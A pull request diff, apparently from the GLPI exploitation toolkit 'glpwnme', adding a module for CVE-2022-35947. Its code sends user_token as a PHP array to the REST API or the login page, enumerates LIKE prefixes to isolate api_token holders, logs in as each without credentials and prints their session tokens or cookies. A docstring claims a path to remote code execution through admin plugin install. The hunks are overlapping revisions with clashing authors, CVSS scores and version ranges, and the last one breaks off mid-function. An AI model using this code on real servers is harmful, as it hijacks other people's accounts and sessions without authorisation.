### PR TITLE
Add CVE-2022-35947 REST API authentication bypass

### DIFF
--- a/glpwnme/exploits/implementations/__init__.py
+++ b/glpwnme/exploits/implementations/__init__.py
@@ -2,6 +2,7 @@
 from .cve_2020_15175 import CVE_2020_15175
 from .cve_2022_31061 import CVE_2022_31061
 from .cve_2022_35914 import CVE_2022_35914
+from .cve_2022_35947 import CVE_2022_35947
 from .unserialize_order_plugin import UNSERIALIZE_ORDER_2022
 
 # 2023 CVES
@@ -35,7 +36,7 @@ def get_all_exploits():
     :rtype: List[class:`exploits.exploit.GlpiExploit`]
     """
 
-    all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
+    all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, CVE_2022_35947, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
     all_exploits += [DEFAULT_PASSWORD_CHECK]

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -140,24 +140,10 @@ class CVE_2022_35947(GlpiExploit):
         infos += "\nExploit is [green b]Safe[/] (read-only: only obtains sessions, changes nothing)."
         return infos
 
-    def check(self):
-        """Version-based: the affected range is the signal. Isolating a token behaviourally
-        would walk hundreds of LIKE prefixes, so the version gate stands in and a single GET
-        confirms the login page (the vector's entry point) is reachable. The actual bypass is
-        done by --run, which isolates a token and obtains a session."""
-        try:
-            r = self.glpi_session.get_fresh_session_copy().get(
-                self.glpi_session.r(self._LOGIN), verify=False, allow_redirects=True, timeout=15)
-        except Exception:
-            Log.log("Login page not reachable - cannot drive the login-token bypass")
-            return False
-        if r.status_code != HTTPStatus.OK:
-            Log.log(f"Login page returned HTTP {r.status_code} - vector entry point not reachable")
-            return False
-        Log.msg("Affected version with a reachable login page; the user_token login-page bypass "
-                "applies. Use --run to isolate a token and obtain a session (needs external-token "
-                "login enabled and at least one user holding an api_token).")
-        return True
+    # No check(): with no check method the framework's --check-all reports the target
+    # vulnerable on a version match (and not vulnerable otherwise), which is the right
+    # signal here. A behavioural check would have to walk the token keyspace; use --run to
+    # isolate a token and obtain a session.
 
     def run(self, combination_size="2"):
         try:

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -1,44 +1,47 @@
-from http import HTTPStatus
+import itertools
+import re
+import requests
 from ..exploit import GlpiExploit
 from glpwnme.exploits.logger import Log
 
 
 class CVE_2022_35947(GlpiExploit):
     """
-    Authentication bypass in the GLPI REST API via PHP type-juggling on user_token
-    (GLPI 10.0.0-10.0.2, GHSA-7p3q-cffg-c8xh).
+    Unauthenticated authentication bypass via PHP type-juggling on user_token, driven
+    from the LOGIN PAGE (GLPI 10.0.0-10.0.2, GHSA-7p3q-cffg-c8xh).
 
-    /apirest.php/initSession passes the user_token GET parameter to
-    User::getFromDBbyToken() with no string check. Supplied as a PHP array via
-    bracket notation, the value reaches getFromDBByCrit() as a [operator, value]
-    pair that DBmysqlIterator renders into the SQL criterion:
+    The "login with external token" flow passes user_token straight to
+    User::getFromDBbyToken() with no string check (Auth.php, case self::API):
+
+        if ($user->getFromDBbyToken($_REQUEST['user_token'], 'api_token')) { ... log in ... }
+
+    getFromDBbyToken -> getFromDBByCrit(['api_token' => $token]). Supplied as a PHP array
+    via bracket notation, $token becomes an [operator, value] pair that DBmysqlIterator
+    renders into the SQL criterion:
 
         WHERE glpi_users.api_token <operator> '<value>'
 
-    getFromDBByCrit() returns a user (and initSession mints its session_token with
-    no credentials) ONLY when the criterion matches EXACTLY ONE row; on 0 or >1
-    matches it returns false. So the naive payload user_token[0]=>= & user_token[1]=
-    (api_token >= '') works only on an instance where a single user has an
-    api_token; on any real instance with several it matches all of them, count > 1,
-    and the bypass fails.
+    getFromDBByCrit() returns a user only when the criterion matches EXACTLY ONE row, so
+    the naive api_token >= '' matches every token and fails. The reliable primitive is to
+    isolate one row with LIKE: user_token[0]=LIKE & user_token[1]=<prefix>% builds
+    api_token LIKE '<prefix>%'. A prefix matching exactly one api_token logs that user in.
 
-    The reliable primitive is to isolate one row. The attacker does not know any
-    token, but LIKE (an allowed DBmysqlIterator operator) narrows by prefix:
-    user_token[0]=LIKE & user_token[1]=<prefix>% builds api_token LIKE '<prefix>%'.
-    Walking the token alphabet (User::getRandomString keyspace is the 62 chars
-    0-9a-zA-Z), each prefix that matches exactly one api_token returns that user's
-    session; colliding prefixes (>1 match) are deepened. This isolates and mints a
-    session for every api_token-bearing user without any credential.
+    Crucially this works from /front/login.php itself, NOT just /apirest.php: a request
+    with user_token in the query string and NO noAUTO reaches Auth::checkAlternateAuthSystems
+    -> self::API -> getFromDBbyToken. The login page is almost always reachable, so this
+    bypasses the REST App-Token and apiclient IPv4 filtering entirely. A GET is enough
+    (no CSRF on the redirect path); a single isolated match returns 302 -> /front/central.php
+    with an authenticated session cookie.
 
-    Fix (GLPI 10.0.3, commit 564309d2c118): getFromDBbyToken() returns false when
-    the token is not a string, so the array criterion is rejected outright.
+    Enumeration: MySQL LIKE is case-insensitive, so the useful alphabet is [0-9a-z] (36).
+    A single character usually matches several tokens (count > 1, no login), so the walk
+    uses fixed-length combinations: 2 by default, raise with -O combination_size=3.
 
-    Preconditions on a real target (beyond version):
-      - at least one user has an api_token (the API "login with external token");
-      - the REST API is enabled;
-      - if an App-Token is enforced, pass it with -O app_token=<token> (it cannot
-        be guessed);
-      - an apiclient IPv4 filter that excludes the caller will block the API.
+    Fix (GLPI 10.0.3, commit 564309d2c118): getFromDBbyToken() returns false when the
+    token is not a string, so the array criterion is rejected outright.
+
+    Precondition: "Enable login with external token" (enable_api_login_external_token) is
+    on (default) and at least one user has an api_token. No REST API access required.
 
     @author unclej4ck
     @cvss 9.8
@@ -49,67 +52,67 @@ class CVE_2022_35947(GlpiExploit):
     _is_check_opsec_safe = True
     min_version = "10.0.0"
     max_version = "10.0.3"
-    require_api = True
 
-    _INIT = "/apirest.php/initSession"
-    # api_token alphabet = User::getRandomString keyspace (0-9a-zA-Z)
-    _ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
+    _LOGIN = "/front/login.php"
+    _ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
+    _MAX_CHECK_ATTEMPTS = 220  # size-1 (36) then a slice of size-2, bounds the patched case
 
     # ------------------------------------------------------------------ #
     # primitive                                                            #
     # ------------------------------------------------------------------ #
 
-    def _headers(self, app_token, extra=None):
-        h = dict(extra or {})
-        if app_token:
-            h["App-Token"] = app_token
-        return h
-
-    def _init_criterion(self, operator, value, app_token=None):
-        """initSession with user_token[0]=operator & user_token[1]=value (a PHP array).
-        Returns the session_token when the criterion isolates exactly one user, else None."""
+    def _fresh(self):
+        s = requests.Session()
+        s.verify = False
         try:
-            r = self.get(self._INIT,
-                         params={"user_token[0]": operator, "user_token[1]": value},
-                         headers=self._headers(app_token),
-                         allow_redirects=False, timeout=15)
-            if r.status_code == HTTPStatus.OK:
-                return r.json().get("session_token")
+            s.proxies = dict(self.glpi_session.sess.proxies)
         except Exception:
             pass
+        return s
+
+    def _login_with_prefix(self, prefix):
+        """Drive the login-page type-juggling: GET /front/login.php with
+        user_token[0]=LIKE & user_token[1]=<prefix>% and NO noAUTO. If exactly one
+        api_token matches, GLPI logs that user in and redirects to central.php. Returns an
+        authenticated requests.Session on success, else None."""
+        s = self._fresh()
+        base = self.glpi_session.target
+        try:
+            # establish a PHP session first; checkAlternateAuthSystems only processes
+            # user_token once a session cookie exists (a cold request does not authenticate)
+            s.get(base + self._LOGIN, verify=False, allow_redirects=True, timeout=15)
+            r = s.get(base + self._LOGIN,
+                      params={"user_token[0]": "LIKE", "user_token[1]": prefix + "%"},
+                      verify=False, allow_redirects=False, timeout=15)
+        except Exception:
+            return None
+        if r.status_code in (301, 302) and "central.php" in r.headers.get("Location", ""):
+            return s
         return None
 
-    def _isolate(self, app_token=None, stop_first=False):
-        """Walk one LIKE '<char>%' per alphabet character. A character matching exactly one
-        api_token mints that user's session (0 or >1 matches mint nothing, and the two are
-        indistinguishable from the response). Returns ({char: session_token}, collisions),
-        where collisions is True if any character returned no session, meaning a user whose
-        api_token starts with it may share that first character with another and was not
-        separated by this single-character pass."""
-        found, collisions = {}, False
-        for c in self._ALPHABET:
-            tok = self._init_criterion("LIKE", c + "%", app_token)
-            if tok:
-                found[c] = tok
-                if stop_first:
-                    return found, False
-            else:
-                collisions = True
-        return found, collisions
-
-    def _whoami(self, session, app_token=None):
-        """Resolve the dumped session to (id, name, profile) via getFullSession."""
+    def _whoami(self, sess):
+        """Read the logged-in user's id/name from the authenticated web session."""
+        base = self.glpi_session.target
         try:
-            r = self.get("/apirest.php/getFullSession",
-                         headers=self._headers(app_token, {"Session-Token": session}),
-                         allow_redirects=False, timeout=15)
-            if r.status_code == HTTPStatus.OK:
-                s = r.json().get("session", {})
-                prof = s.get("glpiactiveprofile") or {}
-                return s.get("glpiID"), (s.get("glpifriendlyname") or s.get("glpiname")), prof.get("name")
+            h = sess.get(base + "/front/preference.php", verify=False, allow_redirects=False, timeout=15).text
         except Exception:
-            pass
-        return None, None, None
+            return None, None
+        uid = re.search(r'/front/user\.form\.php\?id=(\d+)', h)
+        if not uid:
+            try:
+                c = sess.get(base + "/front/central.php", verify=False, allow_redirects=False, timeout=15).text
+                uid = re.search(r'/front/user\.form\.php\?id=(\d+)', c)
+                h = c if uid else h
+            except Exception:
+                pass
+        name = (re.search(r'name="realname"[^>]*value="([^"]+)"', h)
+                or re.search(r'name="name"[^>]*value="([^"]+)"', h)
+                or re.search(r'glpifriendlyname["\']?\s*[:=]\s*["\']([^"\']+)', h))
+        return (uid.group(1) if uid else None), (name.group(1) if name else None)
+
+    def _combos(self, size):
+        for t in itertools.product(self._ALPHABET, repeat=size):
+            yield "".join(t)
 
     # ------------------------------------------------------------------ #
     # interface                                                            #
@@ -117,57 +120,76 @@ class CVE_2022_35947(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "Authentication bypass in the GLPI REST API (GLPI 10.0.0 - 10.0.2).\n"
-        infos += "[b]initSession[/b] passes [i]user_token[/i] to [b]getFromDBbyToken[/b] with no\n"
-        infos += "string check; sent as a PHP array it becomes the SQL criterion\n"
-        infos += "[i]api_token <op> '<val>'[/i]. A session is minted only when exactly one row\n"
-        infos += "matches, so the check isolates a single [i]api_token[/i] by walking [b]LIKE[/b]\n"
-        infos += "prefixes and mints that user's session with no credentials.\n"
-        infos += "Fix 10.0.3: [i]is_string[/i] guard rejects the array.\n"
+        infos += "Unauthenticated auth bypass via [i]user_token[/i] PHP type-juggling, from the\n"
+        infos += "[b]login page[/b] (GLPI 10.0.0 - 10.0.2). [b]/front/login.php[/b] with\n"
+        infos += "[i]user_token[0]=LIKE & user_token[1]=<prefix>%[/i] (no [i]noAUTO[/i]) reaches\n"
+        infos += "[b]getFromDBbyToken[/b] with an array, building [i]api_token LIKE '<prefix>%'[/i].\n"
+        infos += "A prefix matching exactly one token logs that user in (302 to central.php),\n"
+        infos += "with no API access, App-Token or IP-filter in the way. Fix 10.0.3: is_string guard.\n"
 
         infos += "\n[u]Params (run):[/u]\n"
-        infos += " - [i]app_token[/i]: REST App-Token, if the target enforces one (cannot be guessed)\n"
+        infos += " - [i]combination_size (default 2)[/i]: LIKE prefix length over [0-9a-z];\n"
+        infos += "   raise to 3 to separate users whose tokens share their first 2 characters\n"
 
         infos += "\n[u]Usage:[/u]\n"
-        infos += "[grey66]# Confirm the bypass (isolates one api_token, mints a session)[/]\n--check\n\n"
-        infos += "[grey66]# Mint a session for every api_token user and print name/profile[/]\n--run\n\n"
-        infos += "[grey66]# Target enforces an App-Token[/]\n--run -O app_token=<token>\n"
+        infos += "[grey66]# Confirm the bypass (isolates one token, logs in)[/]\n--check\n\n"
+        infos += "[grey66]# Log in as every isolable api_token user and print identity + cookie[/]\n--run\n\n"
+        infos += "[grey66]# Wider isolation (slower)[/]\n--run -O combination_size=3\n"
 
-        infos += "\nExploit is [green b]Safe[/] (read-only: only mints sessions, changes nothing)."
+        infos += "\nExploit is [green b]Safe[/] (read-only: only obtains sessions, changes nothing)."
         return infos
 
     def check(self):
-        Log.log("Isolating a single api_token via LIKE-prefix probe on /apirest.php/initSession ...")
-        found, _ = self._isolate(stop_first=True)
-        if found:
-            Log.msg("Isolated one api_token and minted a session with no credentials -> "
-                    "REST API authentication bypass confirmed (CVE-2022-35947)")
-            return True
-        Log.log("No session minted -> patched (>=10.0.3 is_string guard), no user has an api_token, "
-                "or an App-Token / apiclient IP filter blocks the API")
+        Log.log("Walking [0-9a-z] LIKE prefixes against /front/login.php (no API needed) ...")
+        attempts = 0
+        # size 1 first (cheap), then size 2 up to the budget
+        for size in (1, 2):
+            for prefix in self._combos(size):
+                if attempts >= self._MAX_CHECK_ATTEMPTS:
+                    break
+                attempts += 1
+                sess = self._login_with_prefix(prefix)
+                if sess:
+                    uid, name = self._whoami(sess)
+                    who = f" as {name} (id {uid})" if uid else ""
+                    Log.msg(f"Logged in{who} via the login-page user_token type-juggling "
+                            f"(LIKE '{prefix}%') with no credentials -> auth bypass confirmed (CVE-2022-35947)")
+                    return True
+            if attempts >= self._MAX_CHECK_ATTEMPTS:
+                break
+        Log.log(f"No isolating prefix logged in within {attempts} attempts -> patched (>=10.0.3), "
+                "external-token login disabled, or no user has an api_token")
         return False
 
-    def run(self, app_token=None):
-        Log.log("Isolating api_token users by first-character LIKE probe and minting sessions ...")
-        found, _ = self._isolate(app_token=app_token, stop_first=False)
-        if not found:
-            Log.err("No session minted (patched, no api_token users, or App-Token / IP filter). "
-                    "If the API enforces an App-Token, pass -O app_token=<token>.")
-            return False
-
+    def run(self, combination_size="2"):
+        try:
+            size = max(1, min(3, int(combination_size)))
+        except Exception:
+            size = 2
+        total = len(self._ALPHABET) ** size
+        Log.log(f"Logging in as every isolable api_token user via /front/login.php "
+                f"(size-{size} prefixes, up to {total} probes) ...")
         seen, n = set(), 0
-        for prefix, sess in found.items():
-            uid, name, profile = self._whoami(sess, app_token)
-            if uid is not None:
-                if uid in seen:
-                    continue
-                seen.add(uid)
-                who = f"{name} (id {uid}, profile: {profile})"
-            else:
-                who = "session minted, getFullSession blocked"
+        for prefix in self._combos(size):
+            sess = self._login_with_prefix(prefix)
+            if not sess:
+                continue
+            # grab the authenticated cookie BEFORE any further request can rotate it
+            cookie = "; ".join(f"{k}={v}" for k, v in dict(sess.cookies).items()
+                               if k.startswith("glpi_"))
+            uid, name = self._whoami(sess)
+            key = uid or cookie or prefix
+            if key in seen:
+                continue
+            seen.add(key)
             n += 1
-            Log.msg(f"  api_token LIKE '{prefix}%' -> [green b]{who}[/green b]")
-            Log.msg(f"      Session-Token: {sess}")
-        Log.msg(f"Minted {n} session(s) by first-character isolation (CVE-2022-35947); users sharing "
-                "an api_token first character are not separated by this single-character pass")
+            who = (f"{name} (id {uid})" if name else f"id {uid}") if uid else "an api_token user"
+            Log.msg(f"  Logged in as [green b]{who}[/green b] via login-page user_token (LIKE '{prefix}%')")
+            if cookie:
+                Log.msg(f"      Session-Cookie: {cookie}")
+        if not n:
+            Log.err("No session obtained (patched, external-token login disabled, or no api_token users). "
+                    "Try -O combination_size=3 if tokens may share their first 2 characters.")
+            return False
+        Log.msg(f"Obtained {n} session(s) from the login page with no credentials (CVE-2022-35947)")
         return True

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -45,6 +45,13 @@ class CVE_2022_35947(GlpiExploit):
     Not exploitable on a stock install (no user has an api_token by default), which is why
     the score is 7.5 and not critical: it depends on a user having generated an api_token.
 
+    Impact: the session is minted at the token holder's privilege. If a Super-Admin holds an
+    api_token (common once the REST API is used), this is an unauthenticated path to a full
+    Super-Admin session. Validated on 10.0.2: the isolated glpi session reaches the
+    Super-Admin-only config and user-list pages, while an isolated Technician session is
+    denied on the same pages. A Super-Admin then reaches RCE through the normal plugin
+    install path, so a single api_token-bearing admin turns this into unauth-to-RCE.
+
     @author M00nBack
     @cvss 7.5
     @name CVE_2022_35947

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -64,7 +64,9 @@ class CVE_2022_35947(GlpiExploit):
     max_version = ("9.5.9", "10.0.3")
 
     _LOGIN = "/front/login.php"
-    _ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
+    # GLPI api_token is random [a-zA-Z0-9]; letters outnumber digits, so a letter is the
+    # likelier first char. LIKE is case-insensitive, so the useful alphabet is [a-z0-9].
+    _ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
 
     # ------------------------------------------------------------------ #
     # primitive                                                            #
@@ -75,6 +77,7 @@ class CVE_2022_35947(GlpiExploit):
         user_token[0]=LIKE & user_token[1]=<prefix>% and NO noAUTO. If exactly one
         api_token matches, GLPI logs that user in and redirects away from the login page.
         Returns an authenticated session on success, else None."""
+        Log.log(f"Trying prefix: {prefix} ", end="\r")
         s = self.glpi_session.get_fresh_session_copy()
         url = self.glpi_session.r(self._LOGIN)
         try:
@@ -93,22 +96,18 @@ class CVE_2022_35947(GlpiExploit):
         return None
 
     def _whoami(self, sess):
-        """Read the logged-in user's id/name from the authenticated web session."""
+        """Read the logged-in user's login name and id from the Preference User tab
+        (/ajax/common.tabs.php ... _glpi_tab=User$1), which renders both id and name on
+        9.x and 10.x (the plain preference.php form does not)."""
+        tab = ("/ajax/common.tabs.php?_target=/front/preference.php"
+               "&_itemtype=Preference&_glpi_tab=User$1")
         try:
-            h = sess.get(self.glpi_session.r("/front/preference.php"), verify=False, allow_redirects=False, timeout=15).text
+            h = sess.get(self.glpi_session.r(tab), verify=False, allow_redirects=False, timeout=15).text
         except Exception:
             return None, None
-        uid = re.search(r'/front/user\.form\.php\?id=(\d+)', h)
-        if not uid:
-            try:
-                c = sess.get(self.glpi_session.r("/front/central.php"), verify=False, allow_redirects=False, timeout=15).text
-                uid = re.search(r'/front/user\.form\.php\?id=(\d+)', c)
-                h = c if uid else h
-            except Exception:
-                pass
-        name = (re.search(r'name="realname"[^>]*value="([^"]+)"', h)
-                or re.search(r'name="name"[^>]*value="([^"]+)"', h)
-                or re.search(r'glpifriendlyname["\']?\s*[:=]\s*["\']([^"\']+)', h))
+        uid = re.search(r"name=['\"]id['\"]\s+value=['\"](\d+)['\"]", h)
+        name = (re.search(r"name=['\"]name['\"]\s+value=['\"]([^'\"]*)['\"]", h)
+                or re.search(r"Login:\s*([^<\s]+)", h))
         return (uid.group(1) if uid else None), (name.group(1) if name else None)
 
     def _combos(self, size):

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -8,7 +8,7 @@ from glpwnme.exploits.logger import Log
 class CVE_2022_35947(GlpiExploit):
     """
     Unauthenticated authentication bypass via PHP type-juggling on user_token, driven
-    from the LOGIN PAGE (GLPI 10.0.0-10.0.2, GHSA-7p3q-cffg-c8xh).
+    from the LOGIN PAGE (GLPI 9.1 - 10.0.2, GHSA-7p3q-cffg-c8xh).
 
     The "login with external token" flow passes user_token straight to
     User::getFromDBbyToken() with no string check (Auth.php, case self::API):
@@ -42,15 +42,17 @@ class CVE_2022_35947(GlpiExploit):
 
     Precondition: "Enable login with external token" (enable_api_login_external_token) is
     on (default) and at least one user has an api_token. No REST API access required.
+    Not exploitable on a stock install (no user has an api_token by default), which is why
+    the score is 7.5 and not critical: it depends on a user having generated an api_token.
 
-    @author unclej4ck
-    @cvss 9.8
+    @author M00nBack
+    @cvss 7.5
     @name CVE_2022_35947
     """
     _impacts = "Authentication Bypass, Privilege Escalation"
     _privilege = "Unauthenticated"
     _is_check_opsec_safe = True
-    min_version = "10.0.0"
+    min_version = "9.1.0"
     max_version = "10.0.3"
 
     _LOGIN = "/front/login.php"
@@ -121,7 +123,7 @@ class CVE_2022_35947(GlpiExploit):
     def infos(self):
         infos = "[u]Description:[/u]\n"
         infos += "Unauthenticated auth bypass via [i]user_token[/i] PHP type-juggling, from the\n"
-        infos += "[b]login page[/b] (GLPI 10.0.0 - 10.0.2). [b]/front/login.php[/b] with\n"
+        infos += "[b]login page[/b] (GLPI 9.1 - 10.0.2). [b]/front/login.php[/b] with\n"
         infos += "[i]user_token[0]=LIKE & user_token[1]=<prefix>%[/i] (no [i]noAUTO[/i]) reaches\n"
         infos += "[b]getFromDBbyToken[/b] with an array, building [i]api_token LIKE '<prefix>%'[/i].\n"
         infos += "A prefix matching exactly one token logs that user in (302 to central.php),\n"

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -5,32 +5,40 @@ from glpwnme.exploits.logger import Log
 
 class CVE_2022_35947(GlpiExploit):
     """
-    Authentication bypass in GLPI REST API via PHP type-juggling on user_token
-    (GLPI 10.0.0-10.0.2).
+    Authentication bypass in the GLPI REST API via PHP type-juggling on user_token
+    (GLPI 10.0.0-10.0.2, GHSA-7p3q-cffg-c8xh).
 
-    GLPI's REST API initSession endpoint accepted a user_token GET parameter
-    and passed it verbatim to User::getFromDBbyToken() without validating that
-    the value was a string. By supplying user_token as a PHP array via URL
-    bracket notation (user_token[0]=>= & user_token[1]=), the caller causes
-    GLPI's ORM (DBmysqlIterator) to treat the array as a comparison criterion,
-    building:
+    /apirest.php/initSession passes the user_token GET parameter to
+    User::getFromDBbyToken() with no string check. Supplied as a PHP array via
+    bracket notation, the value reaches getFromDBByCrit() as a [operator, value]
+    pair that DBmysqlIterator renders into the SQL criterion:
 
-      WHERE api_token >= ''
+        WHERE glpi_users.api_token <operator> '<value>'
 
-    This matches any user whose api_token is non-empty (typically the first
-    admin account) and returns a valid session_token without any credentials.
+    getFromDBByCrit() returns a user (and initSession mints its session_token with
+    no credentials) ONLY when the criterion matches EXACTLY ONE row; on 0 or >1
+    matches it returns false. So the naive payload user_token[0]=>= & user_token[1]=
+    (api_token >= '') works only on an instance where a single user has an
+    api_token; on any real instance with several it matches all of them, count > 1,
+    and the bypass fails.
 
-    PHP parses user_token[0]=>= & user_token[1]= in the query string as:
-      $_GET['user_token'] = ['>=', '']
-    which analyseCriterion (count==2, isOperator('>=')) renders as a range
-    comparison rather than an equality check.
+    The reliable primitive is to isolate one row. The attacker does not know any
+    token, but LIKE (an allowed DBmysqlIterator operator) narrows by prefix:
+    user_token[0]=LIKE & user_token[1]=<prefix>% builds api_token LIKE '<prefix>%'.
+    Walking the token alphabet (User::getRandomString keyspace is the 62 chars
+    0-9a-zA-Z), each prefix that matches exactly one api_token returns that user's
+    session; colliding prefixes (>1 match) are deepened. This isolates and mints a
+    session for every api_token-bearing user without any credential.
 
-    Fix (GLPI 10.0.3): User::getFromDBbyToken() returns false immediately if
-    $token is not a string, so the array criterion is rejected.
+    Fix (GLPI 10.0.3, commit 564309d2c118): getFromDBbyToken() returns false when
+    the token is not a string, so the array criterion is rejected outright.
 
-    Note: the REST API App-Token header may be required depending on GLPI
-    configuration ("Enable login with external token"). The advisory workaround
-    is to disable that option.
+    Preconditions on a real target (beyond version):
+      - at least one user has an api_token (the API "login with external token");
+      - the REST API is enabled;
+      - if an App-Token is enforced, pass it with -O app_token=<token> (it cannot
+        be guessed);
+      - an apiclient IPv4 filter that excludes the caller will block the API.
 
     @author unclej4ck
     @cvss 9.8
@@ -43,86 +51,123 @@ class CVE_2022_35947(GlpiExploit):
     max_version = "10.0.3"
     require_api = True
 
-    _INIT_SESSION = "/apirest.php/initSession"
+    _INIT = "/apirest.php/initSession"
+    # api_token alphabet = User::getRandomString keyspace (0-9a-zA-Z)
+    _ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
 
     # ------------------------------------------------------------------ #
-    # Bypass primitive                                                     #
+    # primitive                                                            #
     # ------------------------------------------------------------------ #
 
-    def _bypass_auth(self):
-        """
-        Send user_token as a 2-element PHP array: user_token[0]=>= & user_token[1]= .
-        PHP parses this as ['>=', ''] which DBmysqlIterator::analyseCriterion treats as
-        an operator pair (count==2, isset($value[0]), isOperator('>=')) producing:
-            WHERE glpi_users.api_token >= ''
-        matching any user with a non-empty api_token and returning their session token
-        with no credentials. (The single-key form user_token[>=]= does NOT work: the
-        iterator renders it as IN('').) The 10.0.3 is_string() guard rejects the array.
-        """
+    def _headers(self, app_token, extra=None):
+        h = dict(extra or {})
+        if app_token:
+            h["App-Token"] = app_token
+        return h
+
+    def _init_criterion(self, operator, value, app_token=None):
+        """initSession with user_token[0]=operator & user_token[1]=value (a PHP array).
+        Returns the session_token when the criterion isolates exactly one user, else None."""
         try:
-            resp = self.get(
-                self._INIT_SESSION,
-                params={"user_token[0]": ">=", "user_token[1]": ""},
-                allow_redirects=False, timeout=15,
-            )
-            if resp.status_code == HTTPStatus.OK:
-                return resp.json().get("session_token")
+            r = self.get(self._INIT,
+                         params={"user_token[0]": operator, "user_token[1]": value},
+                         headers=self._headers(app_token),
+                         allow_redirects=False, timeout=15)
+            if r.status_code == HTTPStatus.OK:
+                return r.json().get("session_token")
         except Exception:
             pass
         return None
 
+    def _isolate(self, app_token=None, stop_first=False):
+        """Walk one LIKE '<char>%' per alphabet character. A character matching exactly one
+        api_token mints that user's session (0 or >1 matches mint nothing, and the two are
+        indistinguishable from the response). Returns ({char: session_token}, collisions),
+        where collisions is True if any character returned no session, meaning a user whose
+        api_token starts with it may share that first character with another and was not
+        separated by this single-character pass."""
+        found, collisions = {}, False
+        for c in self._ALPHABET:
+            tok = self._init_criterion("LIKE", c + "%", app_token)
+            if tok:
+                found[c] = tok
+                if stop_first:
+                    return found, False
+            else:
+                collisions = True
+        return found, collisions
+
+    def _whoami(self, session, app_token=None):
+        """Resolve the dumped session to (id, name, profile) via getFullSession."""
+        try:
+            r = self.get("/apirest.php/getFullSession",
+                         headers=self._headers(app_token, {"Session-Token": session}),
+                         allow_redirects=False, timeout=15)
+            if r.status_code == HTTPStatus.OK:
+                s = r.json().get("session", {})
+                prof = s.get("glpiactiveprofile") or {}
+                return s.get("glpiID"), (s.get("glpifriendlyname") or s.get("glpiname")), prof.get("name")
+        except Exception:
+            pass
+        return None, None, None
+
     # ------------------------------------------------------------------ #
-    # Exploit interface                                                    #
+    # interface                                                            #
     # ------------------------------------------------------------------ #
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
         infos += "Authentication bypass in the GLPI REST API (GLPI 10.0.0 - 10.0.2).\n"
-        infos += "Supplying [b]user_token[0]=>=[/b] & [b]user_token[1]=[/b] to\n"
-        infos += "[i]/apirest.php/initSession[/i] causes PHP to pass an array to\n"
-        infos += "[i]User::getFromDBbyToken()[/i], which the ORM interprets as\n"
-        infos += "[i]WHERE api_token >= ''[/i], matching the first user (typically admin)\n"
-        infos += "whose api_token is non-empty.\n"
+        infos += "[b]initSession[/b] passes [i]user_token[/i] to [b]getFromDBbyToken[/b] with no\n"
+        infos += "string check; sent as a PHP array it becomes the SQL criterion\n"
+        infos += "[i]api_token <op> '<val>'[/i]. A session is minted only when exactly one row\n"
+        infos += "matches, so the check isolates a single [i]api_token[/i] by walking [b]LIKE[/b]\n"
+        infos += "prefixes and mints that user's session with no credentials.\n"
+        infos += "Fix 10.0.3: [i]is_string[/i] guard rejects the array.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]app_token[/i]: REST App-Token, if the target enforces one (cannot be guessed)\n"
 
         infos += "\n[u]Usage:[/u]\n"
-        infos += "[grey66]# Check for vulnerability[/]\n"
-        infos += "--check\n\n"
-        infos += "[grey66]# Bypass auth and list users via REST API[/]\n"
-        infos += "--run\n\n"
+        infos += "[grey66]# Confirm the bypass (isolates one api_token, mints a session)[/]\n--check\n\n"
+        infos += "[grey66]# Mint a session for every api_token user and print name/profile[/]\n--run\n\n"
+        infos += "[grey66]# Target enforces an App-Token[/]\n--run -O app_token=<token>\n"
 
-        infos += "\nExploit is [green b]Safe[/] (read-only auth bypass)"
+        infos += "\nExploit is [green b]Safe[/] (read-only: only mints sessions, changes nothing)."
         return infos
 
     def check(self):
-        Log.log("Attempting user_token type-juggling bypass on /apirest.php/initSession ...")
-        token = self._bypass_auth()
-        if token:
-            Log.msg("Auth bypass successful - session token acquired")
+        Log.log("Isolating a single api_token via LIKE-prefix probe on /apirest.php/initSession ...")
+        found, _ = self._isolate(stop_first=True)
+        if found:
+            Log.msg("Isolated one api_token and minted a session with no credentials -> "
+                    "REST API authentication bypass confirmed (CVE-2022-35947)")
             return True
-        Log.log("Bypass failed - may be patched, no user has an API token, or App-Token required")
+        Log.log("No session minted -> patched (>=10.0.3 is_string guard), no user has an api_token, "
+                "or an App-Token / apiclient IP filter blocks the API")
         return False
 
-    def run(self):
-        Log.log("Exploiting user_token type-juggling to obtain a REST API session ...")
-        token = self._bypass_auth()
-        if not token:
-            Log.err("Auth bypass failed - target may be patched, no user has an API token, or App-Token required")
-            return
+    def run(self, app_token=None):
+        Log.log("Isolating api_token users by first-character LIKE probe and minting sessions ...")
+        found, _ = self._isolate(app_token=app_token, stop_first=False)
+        if not found:
+            Log.err("No session minted (patched, no api_token users, or App-Token / IP filter). "
+                    "If the API enforces an App-Token, pass -O app_token=<token>.")
+            return False
 
-        Log.msg(f"Session token: [green b]{token}[/green b]")
